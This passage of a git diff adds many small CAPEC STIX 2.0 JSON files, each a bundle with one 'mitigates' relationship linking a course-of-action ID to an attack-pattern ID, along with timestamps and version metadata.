0000000000000000000000000000000000000000..8b6e3d4da79ea240509dc97f8cff967f4420cf5b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04ce1f7f-b24d-413f-a857-e285a30a2271.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e0a7aa0b-defd-417b-8ca0-d93134feee53", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04ce1f7f-b24d-413f-a857-e285a30a2271", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55b3c0e8-5896-4190-9262-19406b3de296", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04e85307-5593-45c3-9d89-5f4c7ce3220c.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04e85307-5593-45c3-9d89-5f4c7ce3220c.json new file mode 100644 index 0000000000000000000000000000000000000000..4e72f6083fafbfa70ea0acd1c16e50d6975505da --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04e85307-5593-45c3-9d89-5f4c7ce3220c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1822c498-0359-4df3-b7e2-524585629874", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04e85307-5593-45c3-9d89-5f4c7ce3220c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b905638-7933-43ac-ae9f-11ab064839c0", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.6" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json new file mode 100644 index 0000000000000000000000000000000000000000..e3dc2f8b7247b74d1417601ca5365309efc1ac12 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--c603f553-e246-4c01-93fe-597f07c2b21e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04f00f04-9695-4b7c-9593-29b78e51dda7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json new file mode 100644 index 0000000000000000000000000000000000000000..175926b8ef335f7a025746134fcabf1122889917 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--46ba069d-4ced-43b4-8206-d12bfa89ccd6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0586675b-4cd7-41a3-bd0b-f2f269ae8047.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0586675b-4cd7-41a3-bd0b-f2f269ae8047.json new file mode 100644 index 0000000000000000000000000000000000000000..103b03dae93888f0415cdd418600e2f8cc6758c1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0586675b-4cd7-41a3-bd0b-f2f269ae8047.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--1cd1c784-2746-4ecf-99fa-327169f857ae", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0586675b-4cd7-41a3-bd0b-f2f269ae8047", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8253e0c6-cd27-455b-9c00-4ef29aa759d2", + "target_ref": "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "type": "relationship", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json new file mode 100644 index 0000000000000000000000000000000000000000..88405ef4bfaea0b8bfe14c929940cea7aa85b8b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--13105917-4d76-4901-8933-2d812b701fc7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--059701ef-8061-47b4-a433-8f83fe7a16ae", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82858217-6c8b-48b3-950e-5d75c257b76d", + "target_ref": "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json new file mode 100644 index 0000000000000000000000000000000000000000..a1354f6bb68d0218206d4940af8704410e1b8328 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--237a72d7-103e-4963-9b4e-2f5244840720", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json new file mode 100644 index 0000000000000000000000000000000000000000..89f44ddd9691e03738824f9ea7d7c8293a920402 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--7dfb1188-2a9b-4477-adc9-29d929a0ac3a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json new file mode 100644 index 0000000000000000000000000000000000000000..56169993e32502c45f1dddc63647203dee3becf5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--2e9b3730-8e44-4e70-83e2-b44393daddb5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json new file mode 100644 index 0000000000000000000000000000000000000000..c6af902d66cf50a8d3713d360e523276d1fb01f5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--58d5d4bf-6f64-4764-a5f3-6f60452c5bde", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536.json new file mode 100644 index 0000000000000000000000000000000000000000..b83e4146b2afa2b720f490be6f4e2d092b1f86ea --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b9ce15db-7fd9-4617-8dac-40741c2d7866", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0661cc78-7fa4-41ac-acaa-c68639e51727.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0661cc78-7fa4-41ac-acaa-c68639e51727.json new file mode 100644 index 0000000000000000000000000000000000000000..48e181d25f41c4ebdf74e282e299ab45a3c954f0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0661cc78-7fa4-41ac-acaa-c68639e51727.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--59adccc8-15a9-4100-9322-ffa48a3d3e03", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0661cc78-7fa4-41ac-acaa-c68639e51727", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--351a32e9-d4c3-45a9-91e8-3c37ee10071d", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json new file mode 100644 index 0000000000000000000000000000000000000000..48fbed9c38380cccdb897cbef6456d545f02b132 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2d1afad0-8dc6-4cc5-883e-4a716b5bf4a7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json new file mode 100644 index 0000000000000000000000000000000000000000..6faa4edd27155e2caf3c74c8a8659ba06c631146 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fffa52c6-a913-41db-881a-d93e93c4d5e2", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06d27c54-f604-4253-9b67-9e78cfe16886", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "target_ref": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json new file mode 100644 index 0000000000000000000000000000000000000000..a6f8632f3a93d83619964faa53dbc55a5223bf89 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--e21830d9-8835-4a5f-a66a-6d67b8bf45a7", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json new file mode 100644 index 0000000000000000000000000000000000000000..599d6bd064064cd2daa329415a9798ca73a5e2a9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--58acd68a-17c7-4450-91bc-256fbbf3028a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json new file mode 100644 index 0000000000000000000000000000000000000000..5aa57293f0143dda17194a60e77fb5d51cf013b8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--def61398-8597-488e-817f-ed8c93e8121f", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "target_ref": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json new file mode 100644 index 0000000000000000000000000000000000000000..38d0bf641526b6a2e7e7ca51bad42c5c7d489f47 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--ff2083ef-a43e-4ee9-8810-d2b816b2d799", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json new file mode 100644 index 0000000000000000000000000000000000000000..58315c04db2daa82d5eb195a8a47f9126a3e35da --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--cc5cfcc8-ca34-47e1-96e4-ff22a7893d6d", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json new file mode 100644 index 0000000000000000000000000000000000000000..30d901c81a5ba7ffd224f1eb7d28be8504fb1bcc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--43426a3b-770e-4b87-abd0-19e92e5334cb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0868754c-7cfa-484b-914c-804bad2eccd0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0868754c-7cfa-484b-914c-804bad2eccd0.json new file mode 100644 index 0000000000000000000000000000000000000000..9a38d52cb9d132fed82e56d89ec5f2becce8a826 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--0868754c-7cfa-484b-914c-804bad2eccd0.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--0c039783-fa23-4ab5-afb1-a732eef0777a", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0868754c-7cfa-484b-914c-804bad2eccd0", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8933af3c-bb36-4306-b04a-c9d575f6ceae", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--089719e2-cc34-4f35-8302-12fd80decb91.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--089719e2-cc34-4f35-8302-12fd80decb91.json new file mode 100644 index 0000000000000000000000000000000000000000..3e37edf06263ba82b1f50a493327f1cee0ca0fbc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--089719e2-cc34-4f35-8302-12fd80decb91.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--577cf313-2522-4045-b81a-64bb7621c382", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--089719e2-cc34-4f35-8302-12fd80decb91", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1a43fab-c319-4d3d-a2a8-4c43e0ddaa95", + "target_ref": "attack-pattern--5207aecf-9c4c-49c2-b6ca-d2f35f69308b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json new file mode 100644 index 0000000000000000000000000000000000000000..75678d7bb2cfc9aa0e688ea4afbe6e06c82a09ac --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fa2d5514-52d3-4392-a035-453f67b24b7f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08999418-b2b2-438c-aa9b-95bf0933923b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json new file mode 100644 index 0000000000000000000000000000000000000000..df0bf6ebc577fff2934fc0929be718874977d719 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json 
@@ -0,0 +1,21 @@
+{
